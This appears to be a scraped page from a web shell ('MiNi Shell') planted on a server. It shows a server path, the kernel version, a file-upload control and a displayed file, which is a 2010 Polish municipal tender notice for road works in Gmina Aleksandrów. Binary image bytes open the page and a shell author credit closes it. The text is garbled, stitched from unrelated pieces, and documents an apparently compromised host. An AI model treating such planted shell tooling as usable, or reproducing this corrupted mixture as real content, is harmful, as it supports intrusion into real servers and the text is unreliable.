JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20100125/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : //home/vmanager/www/common/web/tenders/20100125/15939-N-2010.html

<p class="kh_header"><b>Aleksandrów: 1.Przebudowa drogi gminnej we wsi Włodzimierzów od km. 0+000 do km. 1+129,66  w istniejącym pasie drogowym dz. nr 132, 101, 133/1
2.Remont (modernizacja) drogi  we wsi Wolica od km. 0+000 do km. 1+231,69 w istniejącym pasie drogowym dz. nr 132, 176</b><br>
<b>Numer ogłoszenia: 15939 - 2010; data zamieszczenia: 25.01.2010</b><br>
OGŁOSZENIE O ZAMÓWIENIU - roboty budowlane<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Gmina Aleksandrów , Aleksandrów 39b, 26-337 Aleksandrów, woj. łódzkie, tel. 044 7560027, faks 044 7560014.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.bip.aleksandrow.net.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> 1.Przebudowa drogi gminnej we wsi Włodzimierzów od km. 0+000 do km. 1+129,66  w istniejącym pasie drogowym dz. nr 132, 101, 133/1
2.Remont (modernizacja) drogi  we wsi Wolica od km. 0+000 do km. 1+231,69 w istniejącym pasie drogowym dz. nr 132, 176.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> roboty budowlane.</p>
<p><b>II.1.3) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> Zadanie 1 - Przebudowa drogi gminnej we wsi Włodzimierzów
1. roboty pomiarowe -  1,20 km
2. profilowanie i zagęszczanie podłoża - 4633,60 m 2
3. warstwa górna podbudowy z kruszyw łamanych gr. 8cm - 4633,60 m2
4. warstwa dolna podbudowy gr. 15 cm - 759,82 m2
5. skropienie emulsją asfaltową podbudowy w ilości 0,7 kg/m2 - 4633,60 m2
6. nawierzchnia z mieszanek mineralno - bitumicznych asfaltowych o grubości  3 cm - 4520,63 m2
7. dodatek za transport mieszanki mineralno-bitumicznej  - 1 km ponad 5 km/ dodatkowana na  25km -339,05t
8.  zagęszczanie poboczy walcami samojezdnymi statycznymi ogumionymi -169,45 m3
9.  pionowe znaki drogowe - 2 szt.
10. mechaniczne plantowanie poboczy - 1694,49 m2
11. inwentaryzacja geodezyjna powykonawcza
Zadanie 2 - Remont (modernizacja) drogi  we wsi Wolica 
1. roboty pomiarowe - 1,24 km
2. profilowanie i zagęszczanie podłoża - 4454,02 m2
3. warstwa górna podbudowy z kruszyw łamanych gr. 15 cm - 4454,02 m2 
4. skropienie emulsją asfaltową podbudowy w ilości 0,7 kg/m2- 4454,02 m2
5.  nawierzchnia z mieszanek mineralno - bitumicznych asfaltowych o grubości 3 cm 
               - 4081,51 m2
6. dodatek za transport mieszanki mineralno - bitumicznej - 1 km ponad 5 km /        dodatkowana na 25 km - 306,11 t
7. uzupełnienie poboczy szer. 50 cmz kruszyw naturalnych - 1231,69 m2
 8.  przepusty rurowe żelbetowe o śr. 50 cm - 11m + 4 ścianki czołowe z betonu                          
 9.  pionowe znaki drogowe szt. 1
 10. inwentaryzacja geodezyjna powykonawcza.</p>
<p><b>II.1.4) Wspólny Słownik Zamówień (CPV):</b> 45.23.31.40-2.</p>
<p><b>II.1.5) Czy dopuszcza się złożenie oferty częściowej:</b> nie.</p>
<p><b>II.1.6) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.1.7) Czy przewiduje się udzielenie zamówień uzupełniających:</b> nie.</p><p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 28.10.2010.</p>

<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WARUNKI DOTYCZĄCE ZAMÓWIENIA</b>
</p><b>Informacja na temat wadium:</b> Od Wykonawców biorących udział w postępowaniu jest wymagane wniesienie wadium - 20 000 tys. zł . zgodnie z art. 45 ust 1-8 PZP 
Bank Spółdzielczy Ziemi Piotrkowskiej w Piotrkowie Tryb. o/Paradyż filia Aleksandrów nr 11 8973 0003 0020 0410 5369 0007<br><p><b>III.2) WARUNKI UDZIAŁU</b></p>
<ul class="kh_indent_1"><li><b>Opis warunków udziału w postępowaniu oraz opis sposobu dokonywania oceny spełniania tych warunków:</b> 4.1O udzielenie Zamówienia mogą ubiegać się Wykonawcy, którzy:
4.1.1Spełniają warunki określone w art. 22 ust. 1 Ustawy, tj.
a posiadają uprawnienia do wykonywania określonej działalności lub czynności, jeżeli ustawy nakładają obowiązek posiadania takich uprawnień;
b posiadają niezbędną wiedzę i doświadczenie oraz dysponują potencjałem technicznym i osobami zdolnymi do wykonania Zamówienia;
c znajdują się w sytuacji ekonomicznej i finansowej za­pewniającej wykonanie Zamówienia;
d nie podlegają wykluczeniu z Postępowania, zgodnie z art. 24 Ustawy.
4.2Zamawiający ustala następujące szczegółowe warunki udziału w Postępowaniu:
4.2.1W zakresie warunku wskazanego w punkcie 4.1.1 a) wymagane jest wykonywanie działalności związanej z przedmiotem zamówienia - robót drogowych. Ocena spełnienia warunków szczegółowych wg zasady spełnia/nie spełnia nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń,                o których mowa w punkcie 5.1.1.
4.2.2W zakresie warunku wskazanego w punkcie 4.1.1 b wymagane jest:
a Dysponowanie osobami fizycznymi, które są zdolne do wykonania w/w robót,
b posiadanie doświadczenie z ostatnich 5 lat, a jeżeli okres prowadzenia działalności jest krótszy z tego okresu wyrażające się tym, że jako główny wykonawca wykonał przynajmniej 2 zamówienia odpowiadające swoim rodzajem i wartością co najmniej 800 tys. zł. łącznie stanowiącym przedmiot zamówienia,  
Ocena spełnienia warunków szczegółowych wg zasady spełnia/nie spełnia nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń,             o których mowa w punkcie 5.1.2.
4.2.3W zakresie warunku wskazanego w punkcie 4.1.1 c wymagane jest posiadanie ubezpieczenia od odpowiedzialności cywilnej w zakresie prowadzonej działalności gospodarczej na kwotę 100% oferty brutto. Posiada zdolność kredytową warunków w wysokości 400 tys zł brutto. Ocena spełnienia warunków szczegółowych wg zasady spełnia/nie spełnia nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa    w punkcie 5.1.3.
4.2.4W zakresie warunków wskazanych w punkcie 4.1.1 d ocena spełnienia warunków szczegółowych wg zasady spełnia/nie spełnia nastąpi na podstawie przedstawionych przez Wykonawcę dokumentów i oświadczeń, o których mowa w punkcie 5.1.1..</li>
<li><b>Informacja o oświadczeniach i dokumentach, jakie mają dostarczyć wykonawcy w celu potwierdzenia spełniania warunków udziału w postępowaniu:</b> 5.1W celu wykazania spełnienia warunków udziału w Postępowaniu, każdy               z Wykonawców powinien przedłożyć wraz z ofertą następujące oświadczenia                  i dokumenty:
5.1.1Warunki szczegółowe określone w punkcie 4.2.1 i 4.2.4 SIWZ - do oferty każdy          z Wykonawców jest zobowiązany dołączyć dokumenty które są składane w formie oryginału lub kopii poświadczonej za zgodność z oryginałem prze wykonawcę.         
a)aktualny odpis z właściwego rejestru albo aktualne zaświadczenie o wpisie do ewidencji działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub zgłoszenia do ewidencji działalności gospodarczej wystawionego nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.
b)Oświadczenie o braku wykluczenia wg wzoru określonego w formularzu Nr 2.
c)Oświadczenie wykonawcy o spełnieniu warunków w postępowaniu zgodnie z formularzem Nr 3 .
5.1.2Warunki szczegółowe określone w punkcie 4.2.2 SIWZ - wraz z ofertą każdy              z Wykonawców powinien złożyć oświadczenie, że posiada niezbędną wiedzę               i doświadczenie oraz potencjał techniczny, a także dysponuje osobami zdolnymi do wykonania Zamówienia. Jednocześnie do oferty należy załączyć:
a)wykaz osób i podmiotów, które będą uczestniczyć w wykonywaniu Zamówienia, wraz z informacjami na temat ich kwalifikacji (uprawnienia budowlane i aktualne zaświadczenie właściwej Izby Samorządu Zawodowego) niezbędnych do wykonania Zamówienia, a także zakresu wykonywanych przez nich czynności zgodnie z formularzem Nr 4;
b)wykaz wykonanych robót budowlanych w okresie ostatnich 5 lat przed  dniem wszczęcia postępowania o udzielenie zamówienia, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie odpowiadających swoim rodzajem  robotom  budowlanym stanowiącym przedmiot zamówienia i wartością co najmniej 800 tys. zł. łącznie  z podaniem ich wartości oraz daty i miejsca wykonania oraz załączeniem dokumentów potwierdzających, że roboty te zostały wykonane należycie ( referencje); po dniu 15.02.2005 r. i zakończone przed 15.02.2010 r. zgodnie z formularzem Nr 5 
5.1.3Warunki szczegółowe określone w punkcie 4.2.3 SIWZ - wraz z ofertą każdy              z Wykonawców zobowiązany jest   złożyć:
- aktualne zaświadczenie właściwego naczelnika urzędu skarbowego oraz właściwego oddziału Zakładu Ubezpieczeń Społecznych lub Kasy Rolniczego Ubezpieczenia Społecznego potwierdzających odpowiednio, że wykonawca nie zalega z opłacaniem podatków, opłat oraz składek na ubezpieczenie zdrowotne i społeczne, lub zaświadczeń, że uzyskał przewidziane prawem zwolnienie, odroczenie lub rozłożenie na raty zaległych płatności lub wstrzymanie w całości wykonania decyzji właściwego organu - wystawionych nie wcześniej niż                    3 miesiące przed upływem terminu składania wniosków o dopuszczanie do udziału postępowaniu o udzielenie zamówienia albo składania ofert. 
- aktualnej informacji z Krajowego rejestru Karnego w zakresie określonym w art.24 ust1 pkt.4,8 ustawy, wystawionej nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.  
- aktualnej informacji z Krajowego rejestru Karnego w zakresie określonym w art.24 ust 1 pkt. 9 ustawy, wystawionej nie wcześniej niż 6 m-cy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert.  
- informacji Banku lub Spółdzielczej Kasy Oszczędnościowo - Kredytowej, w których wykonawca posiada rachunek, potwierdzającej wysokość posiadanych środków finansowych lub zdolność kredytową wykonawcy, w wys. 400 tys zł wystawionej nie wcześniej niż 3 m-ce przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert. 
- polisa ubezpieczeniowa w zakresie prowadzonej działalności w wysokości 100% wartości oferty brutto;
5.2Oferty przedstawione przez dwa lub więcej podmiotów występujących wspólnie, będą musiały spełniać następujące wymagania:
a)oferta będzie zawierać informacje i dokumenty wymienione w punkcie 5.1.1 lit a)  dotyczące każdego partnera konsorcjum;
b)oferta będzie podpisana w taki sposób, by wiązała prawnie wszystkich partnerów;
c)wszyscy partnerzy będą ponosić odpowiedzialność solidarną za wykonanie umowy zgodnie z jej postanowieniami;
d)jeden z partnerów konsorcjum zostanie ustanowiony jako pełnomocnik, upoważniony do reprezentowania wszystkich uczestników konsorcjum w postępowaniu albo reprezentowania wszystkich uczestników konsorcjum w postępowaniu i zawarcia umowy w sprawie Zamówienia;
e)Zamawiający może w ramach odpowiedzialności solidarnej żądać wykonania umowy w całości przez partnera kierującego lub od wszystkich partnerów łącznie lub od każdego z osobna, albo też w inny sposób ustalony w umowie konsorcjum.
5.3Przy ocenie spełnienia warunków udziału, o których mowa w pkt 4.2.2 i 4.2.3 przez Wykonawców wspólnie ubiegających się o udzielenie zamówienia (konsorcjum) wielkości stanowiące o spełnieniu warunków będą zsumowane. Nie spełnienie powyższych wymagań spowoduje wykluczenie oferty konsorcjum. Doświadczenia podwykonawców oraz ich zasoby nie będą brane pod uwagę przy określaniu czy wykonawca spełnia warunki udziału..</li></ul>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>

<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>
<br><p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p><p><b>IV.2.2) Wykorzystana będzie aukcja elektroniczna:</b> nie.</p><br><p><b>IV.3) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.3.1)</b>&nbsp;<b>Adres strony internetowej, na której dostępna jest specyfikacja istotnych warunków zamówienia:</b> www.bip.aleksandrow.net.pl.<br><b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> Specyfikację można odbierać w pokoju nr 104 w Urzędzie Gminy w Aleksandrowie za odpłatnością lub na stronie internetowej (www.bip.aleksandrow.net.pl)..</p>
<p><b>IV.3.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 15.02.2010 godzina 09:30, miejsce: Sekretariat Urzędu Gminy w Aleksandrowie, 26-337 Aleksandrów 39B.</p><p><b>IV.3.5) Termin związania ofertą:</b> do 17.03.2010.</p>

Creat By MiNi SheLL
Email: jattceo@gmail.com